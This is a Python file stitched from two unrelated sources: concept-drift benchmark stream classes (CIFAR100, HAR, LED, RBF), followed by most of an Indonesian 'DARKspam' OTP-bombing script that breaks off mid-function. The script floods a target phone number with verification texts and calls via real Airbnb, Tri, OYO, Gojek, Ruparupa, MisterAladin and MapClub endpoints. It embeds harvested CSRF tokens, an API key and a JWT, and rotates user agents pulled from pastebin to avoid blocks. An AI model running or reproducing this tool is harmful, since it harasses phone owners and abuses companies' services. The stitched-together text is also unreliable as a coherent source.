y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedCIFAR100, self).__init__(data=x, y=y)
def id(self) -> str:
return "sCIFAR100"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
class RandomOrderCIFAR100(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar100.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderCIFAR100, self).__init__(data=data, y=y)
def id(self) -> str:
return "CIFAR100"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class HIPE(ChangeStream):
def __init__(self, preprocess=None):
x = preprocess_hipe()
y = np.zeros(shape=len(x))
if preprocess:
x = preprocess(x)
self._change_points = y
super(HIPE, self).__init__(data=x, y=y)
def id(self) -> str:
return "HIPE"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class LED(ChangeStream, RegionalChangeStream):
def __init__(self, n_per_concept: int = 10000, n_drifts: int = 10, has_noise=True, preprocess=None):
"""
Creates a sudden, but
:param n_per_concept:
:param n_drifts:
:param has_noise:
:param preprocess:
"""
self.has_noise = has_noise
random_state = 0
x = []
for i in range(n_drifts):
x.append(led_generator.LEDGenerator(random_state=random_state, has_noise=has_noise,
noise_percentage=(i + 1) / n_drifts if i % 2 == 1 else 0
).next_sample(n_per_concept)[0])
y = [i for i in range(n_drifts) for _ in range(n_per_concept)]
x = np.concatenate(x, axis=0)
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(LED, self).__init__(data=x, y=np.array(y))
def id(self) -> str:
return "LED"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self.change_points()[self.sample_idx]
def approximate_change_regions(self):
if self.has_noise:
return [1 if i < 7 else 0 for i in range(len(self.y))]
else:
return [1 for _ in range(len(self.y))]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
raise NotImplementedError
class HAR(ChangeStream):
def __init__(self, preprocess=None):
this_dir, _ = os.path.split(__file__)
path_to_data = os.path.join(this_dir, "..", "data", "har")
test = pd.read_csv(os.path.join(path_to_data, "test.csv"))
train = pd.read_csv(os.path.join(path_to_data, "train.csv"))
x = pd.concat([test, train])
x = x.sort_values(by="Activity")
y = LabelEncoder().fit_transform(x["Activity"])
x = x.drop(["Activity", "subject"], axis=1)
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(HAR, self).__init__(data=x, y=y)
def id(self) -> str:
return "sHAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class RandomOrderHAR(ChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
this_dir, _ = os.path.split(__file__)
path_to_data = os.path.join(this_dir, "..", "data", "har")
test = pd.read_csv(os.path.join(path_to_data, "test.csv"))
train = pd.read_csv(os.path.join(path_to_data, "train.csv"))
x = pd.concat([test, train])
x = x.sort_values(by="Activity")
y = LabelEncoder().fit_transform(x["Activity"])
x = x.drop(["Activity", "subject"], axis=1).to_numpy()
if preprocess:
x = preprocess(x)
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes, shuffle_within_concept=True)
self._change_points = change_points
super(RandomOrderHAR, self).__init__(data=data, y=y)
def id(self) -> str:
return "HAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class RBF(ChangeStream, RegionalChangeStream):
def __init__(self, n_per_concept: int = 10000,
n_drifts: int = 10, dims: int = 100,
n_centroids: int = 10, add_dims_without_drift=True, preprocess=None):
self.add_dims_without_drift = add_dims_without_drift
sample_random_state = 0
x = []
no_drift = []
for i in range(n_drifts):
model_random_state = i
x.append(random_rbf_generator.RandomRBFGenerator(model_random_state=model_random_state,
sample_random_state=sample_random_state, n_features=dims,
n_centroids=n_centroids).next_sample(n_per_concept)[0])
if add_dims_without_drift:
no_drift_model_random_state = n_drifts # a random seed that we will not use to create drifts
no_drift.append(random_rbf_generator.RandomRBFGenerator(model_random_state=no_drift_model_random_state,
sample_random_state=sample_random_state,
n_features=dims, n_centroids=n_centroids
).next_sample(n_per_concept)[0])
y = [i for i in range(n_drifts) for _ in range(n_per_concept)]
x = np.concatenate(x, axis=0)
if add_dims_without_drift:
noise = np.concatenate(no_drift, axis=0)
x = np.concatenate([x, noise], axis=1)
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(RBF, self).__init__(data=x, y=np.array(y))
def id(self) -> str:
return "RBF"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self.change_points()[self.sample_idx]
def approximate_change_regions(self):
if self.add_dims_without_drift:
return [1 if i < len(self.y) / 2 else 0 for i in range(len(self.y))]
else:
return [1 for _ in range(len(self.y))]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
raise NotImplementedError
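When `add_dims_without_drift` is set, RBF appends an equally sized drift-free feature block (drawn with a seed outside the drifting range) along axis 1, so only the first half of the dimensions actually change between concepts. A numpy sketch of that concatenation with hypothetical sizes:

```python
import numpy as np

rng = np.random.default_rng(0)
n_samples, dims = 5, 3  # hypothetical sizes
drifting = rng.normal(loc=2.0, size=(n_samples, dims))  # distribution changes per concept
static = rng.normal(loc=0.0, size=(n_samples, dims))    # drift-free block, fixed seed
x = np.concatenate([drifting, static], axis=1)
print(x.shape)  # (5, 6)
```

The doubled feature space lets a regional detector be evaluated on whether it localizes the change to the drifting half.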
class ArtificialStream(ClassificationStream):
def id(self) -> str:
return self.filename[:-4]
def __init__(self, filename: str):
self.filename = filename
path, _ = os.path.split(__file__)
path = os.path.join(path, "..", "concept-drift-datasets-scikit-multiflow", "artificial")
file_path = os.path.join(path, filename)
assert os.path.exists(file_path), "The requested file does not exist in {}".format(file_path)
super(ArtificialStream, self).__init__(data_path=file_path)
class RealWorldStream(ClassificationStream):
def id(self) -> str:
return self.filename[:-4]
def __init__(self, filename: str):
self.filename = filename
path, _ = os.path.split(__file__)
path = os.path.join(path, "..", "concept-drift-datasets-scikit-multiflow", "real-world")
file_path = os.path.join(path, filename)
assert os.path.exists(file_path), "The requested file does not exist in {}".format(file_path)
super(RealWorldStream, self).__init__(data_path=file_path)
if __name__ == '__main__':
stream = RandomOrderHAR()
print(stream.id())
while stream.has_more_samples():
x, y, is_change = stream.next_sample()
if is_change:
print("Change at index {}".format(stream.sample_idx))
if isinstance(stream, RegionalChangeStream):
change_regions = stream.approximate_change_regions()
stream.plot_change_region(2, binary_thresh=0.5, save=False)
# DARKspam_2/darkspam_Open.py (MIT license)
# Python bytecode 2.7
try:
from getpass import getpass
import subprocess as sp, os, time, sys, requests, random, json
from bs4 import BeautifulSoup as bs
except:
print '%s[%s!%s] %sModule belum terinstall' % (W1, R1, W1, W0)
spin()
os.system('pip2 install requests bs4')
print '%s[%s!%s] %sInstalasi selesai' % (W1, R1, W1, W0)
print '%s[%s!%s] %sRun again' % (W1, R1, W1, W0)
print '%s[%s!%s] %spython2 darkspam.py' % (W1, R1, W1, W0)
metu()
G0 = '\x1b[0;32m'
G1 = '\x1b[1;32m'
C0 = '\x1b[0;36m'
C1 = '\x1b[1;36m'
P0 = '\x1b[0;35m'
P1 = '\x1b[1;35m'
W0 = '\x1b[0;37m'
W1 = '\x1b[1;37m'
B0 = '\x1b[0;34m'
B1 = '\x1b[1;34m'
R0 = '\x1b[0;31m'
R1 = '\x1b[1;31m'
Y1 = '\x1b[1;33m'
Y0 = '\x1b[0;33m'
BG = '\x1b[1;97;41m'
RE = '\x1b[0m'
r = '\x1b[91m'
c = '\x1b[96m'
w = '\x1b[0m'
def wait(t):
for x in range(t):
t -= 1
sys.stdout.write('\r' + '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m]\x1b[0;37m Tunggu ' + str(t) + 's')
sys.stdout.flush()
time.sleep(1)
def spin():
try:
L = '\\|/-'
for q in range(10):
time.sleep(0.1)
sys.stdout.write('\r\x1b[1;32m[\x1b[1;33m' + L[(q % len(L))] + '\x1b[1;32m]\x1b[0;37m Loading please wait...')
sys.stdout.flush()
except:
exit()
def ketik(teks):
for i in teks + '\n':
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(0.001)
def load(word):
lix = ['/', '-', '\xe2\x95\xb2', '|']
for i in range(5):
for x in range(len(lix)):
sys.stdout.write(('\r{}{}').format(str(word), lix[x]))
time.sleep(0.2)
sys.stdout.flush()
def metu():
print '%s[%sx%s] %sExiting Program' % (W1, R1, W1, R0)
exit(1)
def koneksi():
logo()
try:
rq = requests.get('http://github.com')
spin()
print '\n%s[%s#%s] %sKoneksi bagus' % (G1, Y1, G1, W0)
time.sleep(2)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi' % (W1, R1, W1, W0)
time.sleep(1)
metu()
def call():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
call()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
call()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'content-length': '82', 'origin': 'https://www.airbnb.co.id', 'x-csrf-token': 'V4$.airbnb.co.id$NeEJZxARGJA$r3bBAEtLKJ7cH3yiFNUKlxsckvHI1tHK4uAJADeUn_A=', 'x-csrf-without-token': '1', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': 'application/json, text/javascript, */*; q=0.01', 'cache-control': 'no-cache', 'x-requested-with': 'XMLHttpRequest', 'referer': 'https://www.airbnb.co.id/signup_login', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.airbnb.co.id/api/v2/phone_one_time_passwords?currency=USD&key=d306zoyjsyarp7ifhu67rjxn52tv0t20&locale=id', headers=hd, json={'phoneNumber': no, 'workFlow': 'GLOBAL_SIGNUP_LOGIN', 'otpMethod': 'CALL'})
if 'true' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(60)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(60)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
call()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def src():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
src()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
src()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
head = {'content-length': '27', 'accept': '*/*', 'origin': 'https://nabil.my.id', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://nabil.my.id/Ayo_Src_Bom', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://nabil.my.id/Tools/Prank-Tools/Ayo-Src/api.php', headers=head, data={'nomor': no, 'jumlah': '1'})
if 'Terkirim' in str(a.text):
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
src()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def air():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
air()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
air()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
data = {'phoneNumber': no, 'workFlow': 'GLOBAL_SIGNUP_LOGIN', 'otpMethod': 'TEXT'}
datajson = json.dumps(data)
hd = {'origin': 'https://www.airbnb.co.id', 'x-csrf-token': 'V4$.airbnb.co.id$pgPRrSWF_-4$VvFL20hLPGSifNfUZuQFk0hBSM2sFv7ptbLjEn1qEp0=', 'x-csrf-without-token': '1', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': 'application/json, text/javascript, */*; q=0.01', 'cache-control': 'no-cache', 'x-requested-with': 'XMLHttpRequest', 'referer': 'https://www.airbnb.co.id/signup_login', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.airbnb.co.id/api/v2/phone_one_time_passwords?currency=USD&key=d306zoyjsyarp7ifhu67rjxn52tv0t20&locale=id', headers=hd, data=datajson)
if 'success' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
air()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def ald():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ald()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ald()
print
z = 0
for x in range(int(jml)):
try:
z += 1
a = requests.post('https://www.misteraladin.com/api/members/otp/request', data={'phone_number_country_code': '62', 'phone_number': no, 'type': 'register'})
if 'Coba lagi dalam 59 menit' in a.text:
print '%s[%s%s%s] %sLimit 1 jam, coba lagi nanti' % (W1, R1, z, W1, W0)
time.sleep(1)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
ald()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def tri():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 089XX (khusus no three)\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tri()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
tri()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
head = {'Host': 'registrasi.tri.co.id', 'Connection': 'keep-alive', 'Content-Length': '59', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Origin': 'https://registrasi.tri.co.id', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Referer': 'https://registrasi.tri.co.id/daftar', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = requests.post('https://registrasi.tri.co.id/daftar/generateOTP', headers=head, data={'token': 'rU19E0PpDABQ5CVY2g7uXx7dlr4L5UQx', 'msisdn': no})
if 'success' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
tri()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def oyo():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
oyo()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
oyo()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'Host': 'www.oyorooms.com', 'xsrf-token': 'PyMZVXFT-wEDYO2Cl-2UYrh7FtvGLDywTnOI', 'user-agent': '{acak}', 'accept': '*/*', 'referer': 'https://www.oyorooms.com/login/?modal=signup', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + no + '&country_code=%2B62&nod=4&locale=id', headers=hd)
if 'correct' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
oyo()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def coda():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
coda()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
coda()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
head = {'Host': 'revan.mohona.tv', 'Connection': 'keep-alive', 'Content-Length': '18', 'Accept': '*/*', 'Origin': 'http://revan.mohona.tv', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'http://revan.mohona.tv/', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ms;q=0.6,da;q=0.5,pt;q=0.4,jv;q=0.3'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = requests.post('http://revan.mohona.tv/codapay2.php', headers=head, data={'target': no}).text
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(1)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
coda()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def map():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
map()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
map()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
data = {'phone': no}
datajson = json.dumps(data)
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://cmsapi.mapclub.com/api/signup-otp', data=datajson, headers={'Host': 'cmsapi.mapclub.com', 'Connection': 'keep-alive', 'Content-Length': '23', 'Accept': 'application/json, text/plain, */*', 'Origin': 'https://www.mapclub.com', 'Save-Data': 'on', 'User-Agent': '{acak}', 'content-type': 'application/json', 'Referer': 'https://www.mapclub.com/id/user/signup', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,ms;q=0.6,da;q=0.5,pt;q=0.4,jv;q=0.3'})
if 'ok' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
map()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def gojek():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: +628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gojek()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gojek()
print
hd = {'Accept': 'application/json', 'X-Platform': 'Android', 'X-UniqueId': 'd35889777f55fb15', 'X-AppVersion': '3.40.2', 'X-AppId': 'com.gojek.app', 'X-Session-ID': '2f62c15b-c2c8-4103-b9ee-fcb2e16f38b2', 'X-PhoneModel': 'samsung,SMJ111F', 'X-PushTokenType': 'FCM', 'X-DeviceOS': 'Android,5.1.1', 'User-uuid': '', 'X-DeviceToken': '', 'Authorization': 'Bearer', 'Accept-Language': 'id-ID', 'X-User-Locale': 'id_ID', 'Content-Type': 'application/json; charset=UTF-8', 'Content-Length': '101', 'Host': 'api.gojekapi.com', 'Connection': 'Keep-Alive', 'Accept-Encoding': 'gzip', 'User-Agent': 'okhttp/3.12.1'}
data = {'phone': no}
datajson = json.dumps(data)
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://api.gojekapi.com/v4/customers/login_with_phone', headers=hd, data=datajson)
if '30 menit' in a.text:
print '%s[%s%s%s] %sLimit 30 menit, coba lagi nanti' % (W1, R1, z, W1, W0)
time.sleep(1)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
gojek()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def rupa():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rupa()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rupa()
data = {'phone': no, 'action': 'register', 'channel': 'message', 'email': '', 'customer_id': '0', 'is_resend': '0'}
datajson = json.dumps(data)
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'origin': 'https://m.ruparupa.com', 'authorization': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiOWYyN2U2ODMtZmQ4My00MDQ0LWIzMDgtOTM1OWFhZTJlMDAyIiwiaWF0IjoxNTgzNjM5Mjg5LCJpc3MiOiJ3YXBpLnJ1cGFydXBhIn0.uIIXB3QCLDhDnFZ-9i90qtjicRXoRK6V622Dmfvnj1o', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': 'application/json', 'referer': 'https://m.ruparupa.com/verification?page=otp-choices', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://wapi.ruparupa.com/auth/generate-otp', headers=hd, data=datajson)
if 'Kode verifikasi berhasil dikirimkan' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(30)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(30)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
rupa()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def idh():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
idh()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
idh()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
